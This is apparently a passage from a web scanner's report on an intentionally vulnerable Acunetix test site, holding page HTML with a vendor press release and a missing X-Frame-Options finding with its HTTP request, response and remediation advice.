J0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30393Response body (30393 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBi